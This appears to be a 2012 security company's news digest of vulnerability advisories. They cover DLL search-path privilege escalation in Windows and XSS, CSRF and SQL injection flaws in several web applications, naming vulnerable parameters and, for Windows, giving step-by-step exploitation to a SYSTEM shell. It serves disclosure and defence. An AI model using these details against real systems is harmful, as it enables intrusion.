To raise awareness of the threat facing all types of organisations, High-Tech Bridge organises its annual conference entitled "How to Secure Your Digital Assets in the Era of Cyber War". The conference will take place on Tuesday, 16 October 2012, at Crowne Plaza Hotel, Geneva.

Frost & Sullivan Principal Alexander Michael will be speaking at the conference with the following presentation: "Ethical Hacking: Why it is a Business Investment, not a Cost".

For additional information about the event, please follow the link: https://www.htbridge.com/events/high_tech_bridge_annual_conference_2012.html

If you would like to obtain Mr Michael's presentation or receive Frost & Sullivan's two recent security whitepapers, please contact Joanna Lewandowska, Corporate Communications, at joanna.lewandowska (at) frost.com.

Source: How to Secure Your Digital Assets in the Era of Cyber War (frost.com)

HTB23108: Privilege escalation vulnerability in Microsoft Windows

This Tuesday, October 9, High-Tech Bridge has disclosed details of security advisory HTB23108: Privilege escalation vulnerability in Microsoft Windows.

Vendor:	Microsoft Corporation
Vulnerable Versions:	Windows Vista, Windows Server 2008, Windows 7, Windows 8 RP
Tested Version:	Windows Vista Ultimate SP1, Windows 2008 SP2, Windows 7 Professional SP1, Windows 8 RP
Vulnerability Type:	Uncontrolled Search Path Element [CWE-427]
CVE Reference:	Pending
CVSSv2 Base Score:	6 (AV:L/AC:H/Au:S/C:C/I:C/A:C)
Risk Level:	Medium

Description

High-Tech Bridge Security Research Lab has discovered a vulnerability in Microsoft Windows which could be exploited to escalate privileges under certain conditions.

The vulnerability exists due to the "IKE and AuthIP IPsec Keying Modules" system service, which tries to load the "wlbsctrl.dll" DLL that is missing after default Windows installation.

The "IKE and AuthIP IPsec Keying Modules" service starts automatically in default configuration (after default installation) of:

• Microsoft Windows Vista
• Microsoft Windows 2008
• Microsoft Windows 7
• Microsoft Windows 8 Release Preview

Moreover the service runs with SYSTEM privileges by default. Therefore an unprivileged local user who has write access to a default or any other search PATH locations can execute arbitrary code on the vulnerable system with the privileges of the SYSTEM account.

Vulnerability Details

The "IKE and AuthIP IPsec Keying Modules" service tries to loads the "wlbsctrl.dll" library which is missing. This forces Microsoft Windows to use search PATH procedure to locate the missing dynamic-link file in the following order described by Microsoft.

• The directory from which the application loaded
• The system directory
• The 16-bit system directory
• The Windows directory
• The current directory
• The directories that are listed in the PATH environment variable

When directory is created in the C:\ root folder, access permissions for files and subfolders are inherited from the parent directory. By default members of the Authenticated Users group have FILE_APPEND_DATA and FILE_WRITE_DATA privileges to all directories created within the C:\ root folder. This also applies to folders created by application's installer. The vulnerability is introduced to the system when software does not change default permissions to installation directory and adds its installation path to the PATH system environment variable. Any member of the Authenticated users group can place malicious file named "wlbsctrl.dll" into that folder and execute arbitrary code on the system after simple reboot.

A brief research confirmed that the following well-known software makes the weakness exploitable when installed into the C:\ root folder:

- ActivePerl 5.16.1.1601 (default installation): CVE-2012-5377
Adds to the PATH variable: C:\Perl\Site\bin;

- ActiveTcl 8.5.12 (default installation): CVE-2012-5378
Adds to the PATH variable: C:\TD\bin

- ActivePython 3.2.2.3 (option to modify the PATH variable is inactive, but can be manually activated): CVE-2012-5379
Adds to the PATH variable: C:\Python27\;C:\Python27\Scripts;

- Ruby installer 1.9.3-p194 (option to modify the PATH variable is inactive, but can be manually activated): CVE-2012-5380
Adds to the PATH variable: C:\Ruby193\bin;

- PHP 5.3.17 (option to modify the PATH variable is inactive, but can be manually activated; must be explicitly configured to be installed into C root folder, e.g. C:\PHP): CVE-2012-5381
Adds to the PATH variable: C:\PHP\;

- Zend Server 5.6.0 SP4 (must be explicitly configured to be installed into C root folder, e.g. C:\Zend): CVE-2012-5382
Adds to the PATH variable: C:\Zend\ZendServer\share\ZendFramework\bin

- MySQL 5.5.28 (option to modify the PATH variable is inactive, but can be manually activated; must be explicitly configured to be installed into C root folder, e.g. C:\MySQL): CVE-2012-5383
Adds to the PATH variable: C:\MySQL\MySQL Server 5.5\bin

Attack vectors

Any member of the Authenticated Users group can escalate his privileges to SYSTEM when the following conditions are met:

1. The above-mentioned software sets insecure privileges for installation folder (that is writable by members of the Authenticated Users group).
2. The above-mentioned software adds its installation path to the system PATH environment variable.

Proof of Concept

You can download the PoC (Proof of Concept) that demonstrates vulnerability exploitation under non-privileged user account on default installation of Windows 7 with default installation of the latest version of ActivePerl.

How to exploit:

1. Log in under an unprivileged system account.
2. Download and extract the HTB23108-P0c-Windows-Services.rar archive.
3. Copy the files from the archive into the C:\Perl\site\bin folder.
4. Reboot the system.
5. Log in under unprivileged system account.
6. Run the C:\Perl\site\bin\ADMC.exe file.

7. Enter the following credentials when asked:
   Login: fox
   Password: 1234

8. Type "shell" and then "whoami" command in the system console and you will see: "nt authority\system" – you have administrative console.

Conclusion

Many Windows services have missing DLLs, and search PATH procedure is a built-in Windows feature. However, in this case the service with the missing DLL runs by default with SYSTEM privileges. Combined with some well-known software in default installation this "feature" becomes a perfectly exploitable vulnerability under relatively spread Windows configuration.

Solution:

Official MSRC answer:
Microsoft has thoroughly investigated the claim and found that this is not a product vulnerability. In the scenario in question, the default security configuration of the system has been weakened by a third-party application. Customers who are concerned with this situation can remove the directory in question from PATH or restrict access to the third-party’s application directory to better protect themselves against these scenarios.

Microsoft requested and validated to disclose the advisory on the 9th of October 2012.

APlease refer to our Disclosure Policy if you have any questions.

References:

[1] High-Tech Bridge Advisory HTB23108 - https://www.htbridge.com/advisory/HTB23108 - Privilege Escalation Vulnerability in Microsoft Windows
[2] Microsoft Windows - http://www.microsoft.com - Microsoft Windows is a series of graphical interface operating systems developed, marketed, and sold by Microsoft.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

HTB23115: Template CMS multiple vulnerabilities

Template CMS version 2.1.1 suffers from XSS and CSRF vulnerabilities.

Template CMS

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Template CMS, which can be exploited to perform cross-site scripting (XSS) and cross-site request forgery (CSRF) attacks.

• CWE-79: cross-site scripting in Template CMS:
  Input passed via the "themes_editor" POST parameter to "admin/index.php" is not properly sanitised before being returned to the user (CVE-2012-4901).
  CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)

• CWE-352: cross-site request forgery
  Template CMS v.2.1.1 allows authorized administrator to perform certain actions via HTTP requests without making proper validity checks to verify the source of the requests (CVE-2012-4902).
  CVSSv2 Base Score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)

Related links:

• High-Tech Bridge Advisory HTB23115 - Multiple vulnerabilities in Template CMS
• Template CMS
• CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
• CWE-352: Cross-Site Request Forgery (CSRF)

4 out of 5 websites are vulnerable

Four out of Five Sites are Vulnerable, says Herald Online in article about Web Application Security.

Frost & Sullivan's recent White Paper (WP) discusses the growing threat to web applications putting it into its right business context. Describing the mysterious world of web applications hacking, the paper gives also an overview of the likely victims and outlines what are the solutions for organisations to protect themselves. The paper benefits from the insight and experience of leading security companies and organizations, like MITRE , High-Tech Bridge , and Online Trust Alliance (OTA), who have provided excellent support to Frost & Sullivan during the WP review.

Read more here: http://www.heraldonline.com/2012/09/05/4236143/web-application-security-is-an.html

Related links:

• Frost & Sullivan Whitepaper
• High-Tech Bridge security publication
• Post on htbridge.blogspot.com

HTB23111: TCExam 11.3.008 multiple vulnerabilities

TCExam version 11.3.008 suffers from SQL injection and cross-site scripting (XSS) vulnerabilities. Details of issues published by High-Tech Bridge Security Research Lab and available for public on their advisory page: TCExam multiple vulnerabilities.

1. SQL injection: Input passed via the "user_groups[]" POST parameter to "admin/code/tce_edit_test.php", "subject_id" POST parameter to "/admin/code/tce_show_all_questions.php" scripts are not properly sanitised before being used in a SQL query.
2. Cross-site scripting (XSS): Input passed via the "cid" and "uids" GET parameters to "admin/code/tce_select_users_popup.php" script is not properly sanitised before being returned to the user.

Vulnerability ID: HTB23111
Vendor Notification / Patch / Public Disclosure Dates: August 22 / August 22 / September 12, 2012
Vulnerabilities Type: SQL Injection, XSS
Risk level: Medium
Solution Status: Fixed by Vendor, upgrade to TCExam 11.3.009

TCExam is a web-based CBA - Computer-Based Assessment system (e-exam, CBT - Computer Based Testing) for universities, schools and companies, that enables educators and trainers to author, schedule, deliver, and report on surveys, quizzes, tests and exams.

The Growing Hacking Threat to Websites: An Ongoing Commitment to Web Application Security

September 5, 2012 Frost & Sullivan has published a whitepaper, called "Web Application Security is an On-going Commitment due to Highly Dynamic Hacking Risks".

Frost & Sullivan, High-Tech Bridge, MITRE and OTA: The Growing Hacking Threat to Websites.

The Growing Hacking Threat to Websites, an Ongoing Commitment to Web Application Security from Frost & Sullivan

UPDATE (October, 15th of 2012): Video for this publication added: see it on our blog or on youtube.

How to use PyDbg as a powerful multitasking debugger

Brian Mariani & Frederic Bourla from High-Tech Bridge has published interesting whitepaper "How to use PyDbg as a powerful multitasking debugger". The mean of publication is to provide a reader with an introduction to the Python based debugger and deliver practical and real examples of this powerful security tool usage.

Excerpt from the article (page 2):

The debugger’s goal

• When a program crashes for some reason it is often hard to realize what happened without using the appropriate tool.
• A debugging tool is a program which aims to analyze other programs.
• The main interest when using a debugger is to analyze the code behavior or to find a bug in another program.
• A debugger allows a programmer or a researcher to quickly identify the cause of a problem in the code.

You can view this publication on SlideShare:

How to use PyDbg as a powerful multitasking debugger from High-Tech Bridge SA (HTBridge)

PyDbg as debugger for infosec researchers in other sources:

• How to use PyDbg as a powerful multitasking debugger whitepaper on PacketStormSecurity.
• PyDbg as debugger howto on exploit-db.

HTB23095: Kayako Fusion 4.40.1148 cross-site scripting (XSS) vulnerability

Kayako Fusion version 4.40.1148 and probably prior suffers from cross-site scripting (XSS) vulnerability (CVE-2012-3233).

This XSS vulnerability can be exploited to execute arbitrary HTML and script code in user's browser session in context of an affected website: input appended to the URL after "/__swift/thirdparty/PHPExcel/PHPExcel/Shared/JAMA/ docs/download.php" is not properly sanitised before being returned to the user.

Vulnerability ID: HTB23095
Vendor Notification / Public Disclosure Dates: June 6 / September 5, 2012
Vulnerability Type: Cross-Site Scripting [CWE-79]
Risk level: Medium [CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)]
Solution Status: Fixed by Vendor, upgrade to Kayako Fusion 4.50.1581

Kayako Fusion is the world's leading multi-channel helpdesk solution that enables organizations to deliver a better customer experience and work more effectively as a team, whatever their size.

See details and PoC-example for this advisory: Cross-Site Scripting (XSS) in Kayako Fusion.

HTB23110: Flogr 2.5.6 cross-site scripting (XSS) vulnerabilities

Flogr version 2.5.6 and probably prior suffers from cross-site scripting (XSS) vulnerability (CVE-2012-4336).

Input appended to the URL after "index.php"; via arbitrary GET parameter to "index.php" is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in user's browser session in context of an affected website.

Vulnerability ID: HTB23110
Vendor Notification / Public Disclosure Dates: August 15 / September 5, 2012
Vulnerability Type: Cross-Site Scripting [CWE-79]
Risk level: Medium [CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)]
More information is available on the advisory page.

HTB23088: TestLink cross-site request forgery (CSRF)

TestLink version 1.9.3 and probably prior suffers from cross-site request forgery (CSRF) vulnerability (CVE-2012-2275).

The source of the requests does not have proper validity checks, this can be exploited to perform certain actions via HTTP requests by authorized users. In original security advisory we can see PoC for "lib/usermanagement/userInfo.php" script to change administrator's email.

Vulnerability ID: HTB23088
Vendor Notification: April 18, 2012
Public Disclosure: September 5, 2012
Vulnerability Type: XSRF/CSRF
Risk level: Medium [CVSSv2 Base Score: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)]
Solution Status: Fixed by Vendor, upgrade to TestLink 1.9.4

See details and PoC-examples for this advisory: Сross-Site Request Forgery (CSRF) in TestLink.

High-Tech Bridge office photos

High-Tech Bridge slightly lifted the veil of secrecy, and now we can see photos of the new company office.

You can also find other photos of High-Tech Bridge's Office. High-Tech Bridge is located on World Trade Center II, Geneva.

High-Tech Bridge Security Research Lab obtains "CWE-Compatible" status

High-Tech Bridge is pleased to announce that Security Advisories by High-Tech Bridge Security Research Lab achieved the final stage of MITRE's formal CWE Compatibility Process and have now "Officially CWE-Compatible" status.

High-Tech Bridge security advisories are now one from 17 CWE-Compatible information security products and services.

The Common Weakness Enumeration (CWE™) is a list of software weaknesses that aims to provide classification mechanism for vulnerabilities. Creating the list is a community initiative. Together, these organizations and any others that wish to join the effort, are creating specific and succinct definitions for each of the elements in the CWE List. Read more about CWE here.

Certificate of CWE Compatibility:

High-Tech Bridge SA's High-Tech Bridge Security Advisories are CWE Compatible

Also, Security Advisories by High-Tech Bridge Research Lab recently obtained "CVE-Compatible" Status, so high-tech bridge advisories are now CVE- and CWE-compatible.

HTB23109: XSS in Phorum 5.2.18

This week details about cross-site scripting (XSS) vulnerability (CVE-2012-4234, HTB23109) in Phorum version 5.2.18 were disclosed by High-Tech Bridge Security Advisories.

Vulnerability details: input passed via the "group" GET parameter to "control.php" script is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in user's browser session in context of an affected website.

Phorum is open source PHP forum software with a penchant for speed. Phorum's very flexible hook and module system can satisfy every web master's needs.

Last friday Phorum 5.2.19 released, wich contain a security fix for this vulnerability. Details available on vendor's website.

HTB23091: PrestaShop 1.4.7-1.4.8 cross-site scripting vulnerabilities

PrestaShop versions 1.4.7, 1.4.8 and probably prior is vulnerable to cross-site scripting attacks. These days information about this vulnerability were published (HTB23091) by High-Tech Bridge Security Research Lab.

Cross-Site Scripting (XSS) vulnerability in PrestaShop (CVE-2012-2517) existed because input passed via the "product" POST parameter to "ajax.php" script is not properly sanitised before being returned to the user. According to Security Glossary, XSS (Cross Site Scripting) is a web application vulnerability that allows to inject arbitrary HTML or scripting code into the web page content.

PrestaShop is the most reliable and flexible Free Open-source e-commerce software. Since 2007, PrestaShop has revolutionized the industry by providing features that engage shoppers and increase online sales.

Founded vulnerability is now fixed, all users can update their installations to PrestaShop v1.4.9.

On High-Tech Bridge's facebook page we can see, that "XSS & CSRF: Exploitation pratique des vulnérabilités" article was published by Hakin9 Magazine. I wish you a pleasant reading.

HTB23104: Cross-site scripting (XSS) vulnerability in Jease

Vulnerability in Jease version 2.8 (and probably prior) has been discovered, which can be exploited to perform cross-site scripting (XSS) attacks. Advisory details were published on High-Tech Bridge Security Advisories page.

Cross-site scripting (XSS) vulnerability in Jease (CVE-2012-4052) existed because input passed via the "author", "subject" and "comment" POST parameters when creating a new comment was not properly sanitised before being returned to the user. According to Wikipedia, Cross-site scripting (XSS) is a type of computer security vulnerability, that enables attackers to inject client-side script into Web pages viewed by other users.

Jease Content Management System is an Open Source CMS which is driven by the power of Java. Jease means "Java with Ease", so Jease promises to keep simple things simple and the hard things (j)easy.

Vulnerability now have status "Fixed", you should upgrade your Jease installation to 2.9 version.

On twitter of High-Tech Bridge we can also see that other advisory about Flogr was published this week. Details will be published later.

HTB23101: PBBoard 2.1.4 multiple vulnerabilities

PBBoard Community Forum version 2.1.4 suffers from SQL injection, improper authentication and improper access control vulnerabilities.

1. SQL injection: Input passed via the "username", "email", "password", "section", "section_id", "member_id", "subjectid" POST parameters to "index.php" script is not properly sanitised before being used in a SQL query.
2. Improper Authentication: PBBoard permits to change password of any board member due to absence of any verification of user-supplied "member_id" POST parameter in the password change script.
3. Improper Access Control: Input passed via the "xml_name" POST parameter to "admin.php" is not properly sanitised before being used as a name of a newly created file.

Vulnerability ID: HTB23101
Vendor Notification / Patch / Public Disclosure Dates: July 18 / August 6 / August 8, 2012
Vulnerabilities Type: SQL injection, improper authentication , improper access control
Risk level: Medium
Solution Status: Fixed by Vendor, Apply 5-8-2012 Security Patch (http://www.pbboard.com/forums/index.php?page=download&attach=1&id=4984)

You can find full text with additional conditions and PoC-examples on HTB advisory page: PBBoard multiple vulnerabilities.

HTB23100: phpList 2.10.18 cross-site scripting and SQL injection vulnerabilities

phpList version 2.10.18 suffers from SQL injection and cross-site scripting (XSS) vulnerabilities.

1. SQL injection: Input passed via the "delete" GET parameter to "admin/index.php" script (when "page" is set to "editattributes") is not properly sanitised before being used in SQL query.
2. Cross-site scripting (XSS): Input passed via the "unconfirmed" GET parameter to "admin/index.php" script (when "page" is set to "user") is not properly sanitised before being returned to the user.

Vulnerability ID: HTB23100
Vendor Notification / Patch / Public Disclosure Dates: July 11 / August 2 / August 8, 2012
Vulnerabilities Type: XSS, SQL Injection
Risk level: Medium
Solution Status: Fixed by Vendor, upgrade to phpList 2.10.19

See details and PoC-examples for this advisory: phpList multiple vulnerabilities.